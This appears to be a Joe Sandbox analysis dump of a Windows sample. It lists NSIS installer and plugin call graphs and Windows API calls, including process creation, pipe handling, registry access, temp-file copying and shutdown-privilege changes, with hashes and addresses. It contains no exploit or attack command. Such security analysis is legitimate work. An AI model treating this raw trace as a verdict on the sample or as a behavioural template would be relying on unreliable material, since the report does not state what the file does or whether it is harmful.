3190->3204 3194 40239c 3192->3194 3221 406557 lstrcpynW 3193->3221 3224 405bb7 3194->3224 3197 401c08 GlobalFree 
3197->3200 3199 401bd3 3222 406557 lstrcpynW 3199->3222 3202 401be2 3228 406557 lstrcpynW 3202->3228 3208 40659f 3204->3208 3205 4067e6 3206 4067ff 3205->3206 3251 406557 lstrcpynW 3205->3251 3206->3188 3208->3205 3209 4067b7 lstrlenW 3208->3209 3211 4066b0 GetSystemDirectoryW 3208->3211 3212 406594 15 API calls 3208->3212 3215 4066c6 GetWindowsDirectoryW 3208->3215 3216 406594 15 API calls 3208->3216 3217 406758 lstrcatW 3208->3217 3220 406728 SHGetPathFromIDListW CoTaskMemFree 3208->3220 3229 406425 3208->3229 3234 40694b GetModuleHandleA 3208->3234 3240 406805 3208->3240 3249 40649e wsprintfW 3208->3249 3250 406557 lstrcpynW 3208->3250 3209->3208 3211->3208 3212->3209 3215->3208 3216->3208 3217->3208 3220->3208 3221->3199 3222->3202 3223->3197 3225 405bcc 3224->3225 3226 405be0 MessageBoxIndirectW 3225->3226 3227 405c18 3225->3227 3226->3227 3227->3200 3228->3200 3252 4063c4 3229->3252 3232 406489 3232->3208 3233 406459 RegQueryValueExW RegCloseKey 3233->3232 3235 406971 GetProcAddress 3234->3235 3236 406967 3234->3236 3237 406980 3235->3237 3256 4068db GetSystemDirectoryW 3236->3256 3237->3208 3239 40696d 3239->3235 3239->3237 3241 406812 3240->3241 3243 406888 3241->3243 3244 40687b CharNextW 3241->3244 3247 406867 CharNextW 3241->3247 3248 406876 CharNextW 3241->3248 3259 405e53 3241->3259 3242 40688d CharPrevW 3242->3243 3243->3242 3245 4068ae 3243->3245 3244->3241 3244->3243 3245->3208 3247->3241 3248->3244 3249->3208 3250->3208 3251->3206 3253 4063d3 3252->3253 3254 4063d7 3253->3254 3255 4063dc RegOpenKeyExW 3253->3255 3254->3232 3254->3233 3255->3254 3257 4068fd wsprintfW LoadLibraryExW 3256->3257 3257->3239 3260 405e59 3259->3260 3261 405e6f 3260->3261 3262 405e60 CharNextW 3260->3262 3261->3241 3262->3260 4774 402621 4775 402dab 21 API calls 4774->4775 4776 402628 4775->4776 4779 406047 GetFileAttributesW CreateFileW 4776->4779 4778 402634 4779->4778 3279 4025a3 3291 402deb 3279->3291 3283 4025b6 3284 4025c5 3283->3284 3289 402933 3283->3289 3285 
4025d2 RegEnumKeyW 3284->3285 3286 4025de RegEnumValueW 3284->3286 3287 4025fa RegCloseKey 3285->3287 3286->3287 3288 4025f3 3286->3288 3287->3289 3288->3287 3292 402dab 21 API calls 3291->3292 3293 402e02 3292->3293 3294 4063c4 RegOpenKeyExW 3293->3294 3295 4025ad 3294->3295 3296 402d89 3295->3296 3297 406594 21 API calls 3296->3297 3298 402d9e 3297->3298 3298->3283 3511 4015a8 3512 402dab 21 API calls 3511->3512 3513 4015af SetFileAttributesW 3512->3513 3514 4015c1 3513->3514 3515 401fa9 3516 402dab 21 API calls 3515->3516 3517 401faf 3516->3517 3518 4055dc 28 API calls 3517->3518 3519 401fb9 3518->3519 3530 405b3a CreateProcessW 3519->3530 3522 401fe2 CloseHandle 3526 402933 3522->3526 3525 401fd4 3527 401fe4 3525->3527 3528 401fd9 3525->3528 3527->3522 3538 40649e wsprintfW 3528->3538 3531 401fbf 3530->3531 3532 405b6d CloseHandle 3530->3532 3531->3522 3531->3526 3533 4069f6 WaitForSingleObject 3531->3533 3532->3531 3534 406a10 3533->3534 3535 406a22 GetExitCodeProcess 3534->3535 3539 406987 3534->3539 3535->3525 3538->3522 3540 4069a4 PeekMessageW 3539->3540 3541 4069b4 WaitForSingleObject 3540->3541 3542 40699a DispatchMessageW 3540->3542 3541->3534 3542->3540 4780 401a2d lstrcmpW 4781 401a21 4780->4781 3595 40202f 3596 402dab 21 API calls 3595->3596 3597 402036 3596->3597 3598 40694b 5 API calls 3597->3598 3599 402045 GetFileVersionInfoSizeW 3598->3599 3600 402061 GlobalAlloc 3599->3600 3601 402c2f 3599->3601 3600->3601 3602 402075 3600->3602 3603 40694b 5 API calls 3602->3603 3604 40207c 3603->3604 3605 40694b 5 API calls 3604->3605 3606 402086 3605->3606 3610 4020d1 3606->3610 3611 40649e wsprintfW 3606->3611 3608 4020bf 3612 40649e wsprintfW 3608->3612 3610->3601 3611->3608 3612->3610 4782 40252f 4783 402deb 21 API calls 4782->4783 4784 402539 4783->4784 4785 402dab 21 API calls 4784->4785 4786 402542 4785->4786 4787 40254d RegQueryValueExW 4786->4787 4792 402933 4786->4792 4788 402573 RegCloseKey 4787->4788 4789 40256d 4787->4789 4788->4792 4789->4788 
4793 40649e wsprintfW 4789->4793 4793->4788 4794 4021af 4795 402dab 21 API calls 4794->4795 4796 4021b6 4795->4796 4797 402dab 21 API calls 4796->4797 4798 4021c0 4797->4798 4799 402dab 21 API calls 4798->4799 4800 4021ca 4799->4800 4801 402dab 21 API calls 4800->4801 4802 4021d4 4801->4802 4803 402dab 21 API calls 4802->4803 4804 4021de 4803->4804 4805 40221d CoCreateInstance 4804->4805 4806 402dab 21 API calls 4804->4806 4809 40223c 4805->4809 4806->4805 4807 401423 28 API calls 4808 4022fb 4807->4808 4809->4807 4809->4808 3623 403532 SetErrorMode GetVersionExW 3624 403586 GetVersionExW 3623->3624 3625 4035be 3623->3625 3624->3625 3626 403615 3625->3626 3627 40694b 5 API calls 3625->3627 3628 4068db 3 API calls 3626->3628 3627->3626 3629 40362b lstrlenA 3628->3629 3629->3626 3630 40363b 3629->3630 3631 40694b 5 API calls 3630->3631 3632 403642 3631->3632 3633 40694b 5 API calls 3632->3633 3634 403649 3633->3634 3635 40694b 5 API calls 3634->3635 3636 403655 #17 OleInitialize SHGetFileInfoW 3635->3636 3711 406557 lstrcpynW 3636->3711 3639 4036a4 GetCommandLineW 3712 406557 lstrcpynW 3639->3712 3641 4036b6 3642 405e53 CharNextW 3641->3642 3643 4036dc CharNextW 3642->3643 3649 4036ee 3643->3649 3644 4037f0 3645 403804 GetTempPathW 3644->3645 3713 403501 3645->3713 3647 40381c 3650 403820 GetWindowsDirectoryW lstrcatW 3647->3650 3651 403876 DeleteFileW 3647->3651 3648 405e53 CharNextW 3648->3649 3649->3644 3649->3648 3657 4037f2 3649->3657 3653 403501 12 API calls 3650->3653 3723 403082 GetTickCount GetModuleFileNameW 3651->3723 3654 40383c 3653->3654 3654->3651 3656 403840 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3654->3656 3655 40388a 3663 405e53 CharNextW 3655->3663 3694 403931 3655->3694 3702 403941 3655->3702 3658 403501 12 API calls 3656->3658 3807 406557 lstrcpynW 3657->3807 3661 40386e 3658->3661 3661->3651 3661->3702 3667 4038a9 3663->3667 3665 403ab3 3669 403b37 ExitProcess 3665->3669 3670 403abb GetCurrentProcess 
OpenProcessToken 3665->3670 3666 403a8f 3668 405bb7 MessageBoxIndirectW 3666->3668 3671 403907 3667->3671 3672 40394a 3667->3672 3674 403a9d ExitProcess 3668->3674 3675 403ad3 LookupPrivilegeValueW AdjustTokenPrivileges 3670->3675 3676 403b07 3670->3676 3677 405f2e 18 API calls 3671->3677 3678 405b22 5 API calls 3672->3678 3675->3676 3679 40694b 5 API calls 3676->3679 3681 403913 3677->3681 3682 40394f lstrlenW 3678->3682 3680 403b0e 3679->3680 3683 403b23 ExitWindowsEx 3680->3683 3686 403b30 3680->3686 3681->3702 3808 406557 lstrcpynW 3681->3808 3810 406557 lstrcpynW 3682->3810 3683->3669 3683->3686 3685 403969 3688 403981 3685->3688 3811 406557 lstrcpynW 3685->3811 3819 40140b 3686->3819 3693 4039a7 wsprintfW 3688->3693 3708 4039d3 3688->3708 3690 403926 3809 406557 lstrcpynW 3690->3809 3695 406594 21 API calls 3693->3695 3751 403c29 3694->3751 3695->3688 3696 405aab 2 API calls 3696->3708 3697 405b05 2 API calls 3697->3708 3698 4039e3 GetFileAttributesW 3701 4039ef DeleteFileW 3698->3701 3698->3708 3699 403a1d SetCurrentDirectoryW 3700 406317 40 API calls 3699->3700 3703 403a2c CopyFileW 3700->3703 3701->3708 3812 403b4f 3702->3812 3703->3702 3703->3708 3704 405c63 71 API calls 3704->3708 3705 406317 40 API calls 3705->3708 3706 406594 21 API calls 3706->3708 3707 405b3a 2 API calls 3707->3708 3708->3688 3708->3693 3708->3696 3708->3697 3708->3698 3708->3699 3708->3702 3708->3704 3708->3705 3708->3706 3708->3707 3709 403aa5 CloseHandle 3708->3709 3710 4068b4 2 API calls 3708->3710 3709->3702 3710->3708 3711->3639 3712->3641 3714 406805 5 API calls 3713->3714 3715 40350d 3714->3715 3716 403517 3715->3716 3717 405e26 3 API calls 3715->3717 3716->3647 3718 40351f 3717->3718 3719 405b05 2 API calls 3718->3719 3720 403525 3719->3720 3721 406076 2 API calls 3720->3721 3722 403530 3721->3722 3722->3647 3822 406047 GetFileAttributesW CreateFileW 3723->3822 3725 4030c2 3746 4030d2 3725->3746 3823 406557 lstrcpynW 3725->3823 3727 4030e8 3728 405e72 2 API calls 3727->3728 
3729 4030ee 3728->3729 3824 406557 lstrcpynW 3729->3824 3731 4030f9 GetFileSize 3732 4031f3 3731->3732 3743 403110 3731->3743 3825 40301e 3732->3825 3734 4031fc 3736 40322c GlobalAlloc 3734->3736 3734->3746 3837 4034ea SetFilePointer 3734->3837 3735 4034d4 ReadFile 3735->3743 3836 4034ea SetFilePointer 3736->3836 3737 40325f 3741 40301e 6 API calls 3737->3741 3740 403247 3745 4032b9 35 API calls 3740->3745 3741->3746 3742 403215 3744 4034d4 ReadFile 3742->3744 3743->3732 3743->3735 3743->3737 3743->3746 3747 40301e 6 API calls 3743->3747 3748 403220 3744->3748 3749 403253 3745->3749 3746->3655 3747->3743 3748->3736 3748->3746 3749->3746 3749->3749 3750 403290 SetFilePointer 3749->3750 3750->3746 3752 40694b 5 API calls 3751->3752 3753 403c3d 3752->3753 3754 403c43 3753->3754 3755 403c55 3753->3755 3853 40649e wsprintfW 3754->3853 3756 406425 3 API calls 3755->3756 3757 403c85 3756->3757 3758 403ca4 lstrcatW 3757->3758 3760 406425 3 API calls 3757->3760 3761 403c53 3758->3761 3760->3758 3838 403eff 3761->3838 3764 405f2e 18 API calls 3765 403cd6 3764->3765 3766 403d6a 3765->3766 3768 406425 3 API calls 3765->3768 3767 405f2e 18 API calls 3766->3767 3769 403d70 3767->3769 3771 403d08 3768->3771 3770 403d80 LoadImageW 3769->3770 3772 406594 21 API calls 3769->3772 3773 403e26 3770->3773 3774 403da7 RegisterClassW 3770->3774 3771->3766 3775 403d29 lstrlenW 3771->3775 3779 405e53 CharNextW 3771->3779 3772->3770 3778 40140b 2 API calls 3773->3778 3776 403e30 3774->3776 3777 403ddd SystemParametersInfoW CreateWindowExW 3774->3777 3780 403d37 lstrcmpiW 3775->3780 3781 403d5d 3775->3781 3776->3702 3777->3773 3782 403e2c 3778->3782 3783 403d26 3779->3783 3780->3781 3784 403d47 GetFileAttributesW 3780->3784 3785 405e26 3 API calls 3781->3785 3782->3776 3787 403eff 22 API calls 3782->3787 3783->3775 3786 403d53 3784->3786 3788 403d63 3785->3788 3786->3781 3789 405e72 2 API calls 3786->3789 3790 403e3d 3787->3790 3854 406557 lstrcpynW 3788->3854 3789->3781 3792 403e49 
ShowWindow 3790->3792 3793 403ecc 3790->3793 3795 4068db 3 API calls 3792->3795 3846 4056af OleInitialize 3793->3846 3797 403e61 3795->3797 3796 403ed2 3798 403ed6 3796->3798 3799 403eee 3796->3799 3800 403e6f GetClassInfoW 3797->3800 3802 4068db 3 API calls 3797->3802 3798->3776 3806 40140b 2 API calls 3798->3806 3801 40140b 2 API calls 3799->3801 3803 403e83 GetClassInfoW RegisterClassW 3800->3803 3804 403e99 DialogBoxParamW 3800->3804 3801->3776 3802->3800 3803->3804 3805 40140b 2 API calls 3804->3805 3805->3776 3806->3776 3807->3645 3808->3690 3809->3694 3810->3685 3811->3688 3813 403b67 3812->3813 3814 403b59 CloseHandle 3812->3814 3866 403b94 3813->3866 3814->3813 3817 405c63 71 API calls 3818 403a82 OleUninitialize 3817->3818 3818->3665 3818->3666 3820 401389 2 API calls 3819->3820 3821 401420 3820->3821 3821->3669 3822->3725 3823->3727 3824->3731 3826 403027 3825->3826 3827 40303f 3825->3827 3828 403030 DestroyWindow 3826->3828 3829 403037 3826->3829 3830 403047 3827->3830 3831 40304f GetTickCount 3827->3831 3828->3829 3829->3734 3832 406987 2 API calls 3830->3832 3833 403080 3831->3833 3834 40305d CreateDialogParamW ShowWindow 3831->3834 3835 40304d 3832->3835 3833->3734 3834->3833 3835->3734 3836->3740 3837->3742 3839 403f13 3838->3839 3855 40649e wsprintfW 3839->3855 3841 403f84 3856 403fb8 3841->3856 3843 403cb4 3843->3764 3844 403f89 3844->3843 3845 406594 21 API calls 3844->3845 3845->3844 3859 404522 3846->3859 3848 4056f9 3849 404522 SendMessageW 3848->3849 3851 40570b OleUninitialize 3849->3851 3850 4056d2 3850->3848 3862 401389 3850->3862 3851->3796 3853->3761 3854->3766 3855->3841 3857 406594 21 API calls 3856->3857 3858 403fc6 SetWindowTextW 3857->3858 3858->3844 3860 40453a 3859->3860 3861 40452b SendMessageW 3859->3861 3860->3850 3861->3860 3864 401390 3862->3864 3863 4013fe 3863->3850 3864->3863 3865 4013cb MulDiv SendMessageW 3864->3865 3865->3864 3867 403ba2 3866->3867 3868 403b6c 3867->3868 3869 403ba7 FreeLibrary GlobalFree 3867->3869 
3868->3817 3869->3868 3869->3869 4810 401a35 4811 402dab 21 API calls 4810->4811 4812 401a3e ExpandEnvironmentStringsW 4811->4812 4813 401a52 4812->4813 4815 401a65 4812->4815 4814 401a57 lstrcmpW 4813->4814 4813->4815 4814->4815 3911 6ff61000 3914 6ff61096 3911->3914 3992 6ff61987 GetCurrentProcess GetModuleHandleA GetProcAddress 3914->3992 3917 6ff6122d GlobalAlloc 3919 6ff61247 3917->3919 3918 6ff610e8 GetModuleFileNameW GlobalAlloc 3920 6ff6112f 3918->3920 3921 6ff6125f FindWindowExW FindWindowExW 3919->3921 3935 6ff6127e 3919->3935 3922 6ff61135 CharPrevW 3920->3922 3923 6ff6114f 3920->3923 3921->3935 3922->3920 3922->3923 3924 6ff6116f GetTempFileNameW 3923->3924 3925 6ff61159 3923->3925 3929 6ff6119e 3924->3929 4008 6ff61c8c 3925->4008 3932 6ff6120b lstrcatW lstrlenW 3929->3932 3933 6ff611b6 CreateFileMappingW MapViewOfFile 3929->3933 3931 6ff6102b 3932->3919 3936 6ff611d7 UnmapViewOfFile 3933->3936 3937 6ff611fd CloseHandle CloseHandle 3933->3937 3934 6ff612aa lstrcmpiW 3934->3935 3938 6ff612bf lstrcmpiW 3934->3938 3935->3934 3997 6ff61c4c 3935->3997 4002 6ff61a61 lstrlenW lstrlenW 3935->4002 3936->3937 3937->3932 3938->3935 3939 6ff612d7 3938->3939 3940 6ff612dc 3939->3940 3941 6ff61308 GetVersion 3939->3941 3942 6ff61c8c 2 API calls 3940->3942 3943 6ff613c7 3941->3943 3944 6ff61390 GlobalAlloc 3941->3944 3948 6ff612e6 3942->3948 3946 6ff613d5 InitializeSecurityDescriptor SetSecurityDescriptorDacl 3943->3946 3947 6ff613fe CreatePipe 3943->3947 3951 6ff61484 lstrcpyW 3944->3951 3952 6ff613c4 3944->3952 3946->3947 3950 6ff61417 CreatePipe 3947->3950 3947->3951 3955 6ff612f7 DeleteFileW 3948->3955 3956 6ff61300 3948->3956 3950->3951 3953 6ff6142a GetStartupInfoW CreateProcessW 3950->3953 3954 6ff6175f 3951->3954 3952->3943 3953->3951 3959 6ff6149b GetTickCount 3953->3959 3957 6ff61767 3954->3957 3958 6ff6176f 3954->3958 3955->3956 3956->3941 3960 6ff61c8c 2 API calls 3957->3960 3961 6ff61787 3958->3961 3963 6ff6177c 3958->3963 3962 6ff614a4 
WaitForSingleObject GetExitCodeProcess 3959->3962 3960->3958 3964 6ff617a2 3961->3964 3965 6ff61790 lstrcpyW 3961->3965 3966 6ff614c4 PeekNamedPipe 3962->3966 3967 6ff61a01 3 API calls 3963->3967 3968 6ff617c3 3964->3968 3969 6ff617ab wsprintfW 3964->3969 3965->3964 3970 6ff614de GetTickCount ReadFile 3966->3970 3971 6ff6170a 3966->3971 3972 6ff61785 3967->3972 3973 6ff61c8c 2 API calls 3968->3973 3969->3968 3991 6ff61520 3970->3991 3971->3954 3974 6ff61716 GetTickCount 3971->3974 3975 6ff6174a Sleep 3971->3975 3972->3961 3976 6ff617cf 6 API calls 3973->3976 3974->3975 3979 6ff61725 TerminateProcess lstrcpyW 3974->3979 3975->3962 3978 6ff617fe 3976->3978 3977 6ff61524 IsTextUnicode 3977->3991 3980 6ff61807 DeleteFileW 3978->3980 3981 6ff61810 GlobalFree 3978->3981 3979->3962 3980->3981 3981->3931 3982 6ff61820 GlobalFree 3981->3982 3982->3931 3983 6ff61597 IsDBCSLeadByteEx 3984 6ff615b6 MultiByteToWideChar 3983->3984 3983->3991 3984->3991 3985 6ff615ec lstrcpyW 3985->3991 3986 6ff61672 GlobalReAlloc 3987 6ff616ec lstrcpyW 3986->3987 3986->3991 3987->3962 3991->3962 3991->3966 3991->3977 3991->3983 3991->3984 3991->3985 3991->3986 4011 6ff61a01 3991->4011 4014 6ff6182a 3991->4014 4018 6ff61948 3991->4018 3993 6ff619c3 3992->3993 3994 6ff619dd GetProcAddress 3992->3994 3993->3994 3995 6ff610e0 3993->3995 3994->3995 3996 6ff619ec 3994->3996 3995->3917 3995->3918 3996->3995 3998 6ff61c56 3997->3998 3999 6ff61c85 3997->3999 3998->3999 4000 6ff61c76 GlobalFree 3998->4000 4001 6ff61c63 lstrcpyW 3998->4001 3999->3935 4000->3999 4001->4000 4003 6ff61abc 4002->4003 4007 6ff61a82 4002->4007 4003->3935 4004 6ff61a8d lstrcmpiW 4004->4003 4004->4007 4007->4004 4021 6ff618cc 4007->4021 4009 6ff61c95 GlobalAlloc lstrcpynW 4008->4009 4010 6ff61163 GlobalFree 4008->4010 4009->4010 4010->3931 4012 6ff61a13 SendMessageW SendMessageW SendMessageW 4011->4012 4013 6ff61a5e 4011->4013 4012->4013 4013->3991 4015 6ff6189d 4014->4015 4016 6ff61837 4014->4016 4015->3991 4016->4015 4017 
6ff618cc CharNextW 4016->4017 4017->4016 4019 6ff61981 4018->4019 4020 6ff61953 CharNextExA 4018->4020 4019->3991 4020->4019 4022 6ff618da lstrlenW 4021->4022 4024 6ff618de 4021->4024 4022->4003 4022->4007 4023 6ff61925 CharNextW 4023->4022 4024->4022 4024->4023 4821 4023b7 4822 4023c5 4821->4822 4823 4023bf 4821->4823 4825 4023d3 4822->4825 4826 402dab 21 API calls 4822->4826 4824 402dab 21 API calls 4823->4824 4824->4822 4827 4023e1 4825->4827 4829 402dab 21 API calls 4825->4829 4826->4825 4828 402dab 21 API calls 4827->4828 4830 4023ea WritePrivateProfileStringW 4828->4830 4829->4827 4831 4014b8 4832 4014be 4831->4832 4833 401389 2 API calls 4832->4833 4834 4014c6 4833->4834 4121 402439 4122 402441 4121->4122 4123 40246c 4121->4123 4125 402deb 21 API calls 4122->4125 4124 402dab 21 API calls 4123->4124 4126 402473 4124->4126 4127 402448 4125->4127 4133 402e69 4126->4133 4129 402452 4127->4129 4130 402480 4127->4130 4131 402dab 21 API calls 4129->4131 4132 402459 RegDeleteValueW RegCloseKey 4131->4132 4132->4130 4134 402e76 4133->4134 4135 402e7d 4133->4135 4134->4130 4135->4134 4137 402eae 4135->4137 4138 4063c4 RegOpenKeyExW 4137->4138 4139 402edc 4138->4139 4140 402f91 4139->4140 4141 402ee6 4139->4141 4140->4134 4142 402eec RegEnumValueW 4141->4142 4146 402f0f 4141->4146 4143 402f76 RegCloseKey 4142->4143 4142->4146 4143->4140 4144 402f4b RegEnumKeyW 4145 402f54 RegCloseKey 4144->4145 4144->4146 4147 40694b 5 API calls 4145->4147 4146->4143 4146->4144 4146->4145 4148 402eae 6 API calls 4146->4148 4149 402f64 4147->4149 4148->4146 4150 402f86 4149->4150 4151 402f68 RegDeleteKeyW 4149->4151 4150->4140 4151->4140 4152 40173a 4153 402dab 21 API calls 4152->4153 4154 401741 SearchPathW 4153->4154 4155 40175c 4154->4155 4835 401d3d 4836 402d89 21 API calls 4835->4836 4837 401d44 4836->4837 4838 402d89 21 API calls 4837->4838 4839 401d50 GetDlgItem 4838->4839 4840 40263d 4839->4840

Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 6FF61987: GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,6FF610E0), ref: 6FF61990
                                                                • Part of subcall function 6FF61987: GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,6FF610E0), ref: 6FF6199E
                                                                • Part of subcall function 6FF61987: GetProcAddress.KERNEL32(00000000,?), ref: 6FF619BD
                                                              • GetModuleFileNameW.KERNEL32(?,00000104), ref: 6FF610FA
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6FF61112
                                                              • CharPrevW.USER32(?,?), ref: 6FF6113D
                                                              • GlobalFree.KERNEL32(00000000), ref: 6FF61164
                                                              • GetTempFileNameW.KERNEL32(?,6FF63088,00000000,?), ref: 6FF61182
                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 6FF61198
                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 6FF611B0
                                                              • CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 6FF611BF
                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 6FF611CD
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 6FF611F7
                                                              • CloseHandle.KERNEL32(00000000), ref: 6FF611FE
                                                              • CloseHandle.KERNEL32(00000000), ref: 6FF61205
                                                              • lstrcatW.KERNEL32(?,6FF63084), ref: 6FF61214
                                                              • lstrlenW.KERNEL32(?), ref: 6FF6121B
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6FF6123C
                                                              • FindWindowExW.USER32(00010432,00000000,#32770,00000000), ref: 6FF61274
                                                              • FindWindowExW.USER32(00000000), ref: 6FF61277
                                                              • lstrcmpiW.KERNEL32(00000000,/OEM,00000000), ref: 6FF612B0
                                                              • lstrcmpiW.KERNEL32(00000000,/MBCS), ref: 6FF612C5
                                                              • DeleteFileW.KERNEL32(?,error), ref: 6FF612FA
                                                              • GetVersion.KERNEL32 ref: 6FF61340
                                                              • GlobalAlloc.KERNEL32(00000040,00000FFE), ref: 6FF613B0
                                                              • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 6FF613DE
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 6FF613EF
                                                              • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 6FF61411
                                                              • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 6FF61424
                                                              • GetStartupInfoW.KERNEL32(00000044), ref: 6FF61431
                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,?), ref: 6FF6147A
                                                              • lstrcpyW.KERNEL32(?,error), ref: 6FF61490
                                                              • GetTickCount.KERNEL32 ref: 6FF6149B
                                                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 6FF614AB
                                                              • GetExitCodeProcess.KERNELBASE(?,?), ref: 6FF614BE
                                                              • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 6FF614CF
                                                              • GetTickCount.KERNEL32 ref: 6FF614DE
                                                              • ReadFile.KERNEL32(?,00000000,00000400,?,00000000), ref: 6FF61503
                                                              • IsTextUnicode.ADVAPI32(6FF630B8,?,00000000), ref: 6FF61529
                                                              • IsDBCSLeadByteEx.KERNEL32(?,?), ref: 6FF6159D
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,6FF630B8,00000001,?,00000002), ref: 6FF615C4
                                                              • lstrcpyW.KERNEL32(?, ), ref: 6FF615F4
                                                              • GlobalReAlloc.KERNEL32(00000002,00000402,00000042), ref: 6FF61686
                                                                • Part of subcall function 6FF61948: CharNextExA.USER32(?,0000000A,00000000,6FF630B8,?,6FF616EA,?,00000002,00000002,0000000A), ref: 6FF61974
                                                              • lstrcpyW.KERNEL32(?,error), ref: 6FF616F8
                                                              • GetTickCount.KERNEL32 ref: 6FF61716
                                                              • TerminateProcess.KERNEL32(?,000000FF), ref: 6FF6172D
                                                              • lstrcpyW.KERNEL32(?,timeout), ref: 6FF6173F
                                                              • Sleep.KERNELBASE(00000064), ref: 6FF6174C
                                                              • lstrcpyW.KERNEL32(?,error), ref: 6FF6179C
                                                              • wsprintfW.USER32 ref: 6FF617BA
                                                              • CloseHandle.KERNEL32(?,?), ref: 6FF617D8
                                                              • CloseHandle.KERNEL32(?), ref: 6FF617E0
                                                              • CloseHandle.KERNEL32(?), ref: 6FF617E5
                                                              • CloseHandle.KERNEL32(?), ref: 6FF617EA
                                                              • CloseHandle.KERNEL32(?), ref: 6FF617EF
                                                              • CloseHandle.KERNEL32(?), ref: 6FF617F4
                                                              • DeleteFileW.KERNEL32(?), ref: 6FF6180A
                                                              • GlobalFree.KERNEL32(?), ref: 6FF61819
                                                              • GlobalFree.KERNEL32(00000002), ref: 6FF61823
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1450170496.000000006FF61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF60000, based on PE: true
                                                              • Associated: 00000000.00000002.1450157086.000000006FF60000.00000002.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000000.00000002.1450186265.000000006FF62000.00000002.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000000.00000002.1450199247.000000006FF63000.00000004.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000000.00000002.1450217071.000000006FF64000.00000002.00000001.01000000.00000005.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff60000_file.jbxd
                                                              Similarity
                                                              • API ID: File$Handle$Close$Global$Createlstrcpy$AllocProcess$CharCountFreePipeTick$ByteDeleteDescriptorFindModuleNameSecurityViewWindowlstrcmpi$AddressCodeCopyCurrentDaclExitInfoInitializeLeadMappingMultiNamedNextObjectPeekPrevProcReadSingleSleepStartupTempTerminateTextUnicodeUnmapVersionWaitWidelstrcatlstrlenwsprintf
                                                              • String ID: $#32770$/MBCS$/OEM$/TIMEOUT=$@1Wu7Wu$D$SysListView32$error$timeout
                                                              • API String ID: 351676774-900835945
                                                              • Opcode ID: 3cf5bbbf10cc0e90380e5fc429ef39bf523758108e03f28c95f28b85638cb955
                                                              • Instruction ID: de3f3d862b9619a1d2b2a12a4e7ec63bf6b39e690ea8fa9c92fa87bf30552f3d
                                                              • Opcode Fuzzy Hash: 3cf5bbbf10cc0e90380e5fc429ef39bf523758108e03f28c95f28b85638cb955
                                                              • Instruction Fuzzy Hash: 01323472C10219EFDF109FA4C984AEEBBB9FF09754F10416AE515E7260DB31AA94CF60

                                                              Control-flow Graph

                                                              APIs
                                                              • SetErrorMode.KERNELBASE ref: 00403555
                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
                                                              • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
                                                              • OleInitialize.OLE32(00000000), ref: 00403670
                                                              • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
                                                              • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
                                                              • CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036DD
                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
                                                              • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954
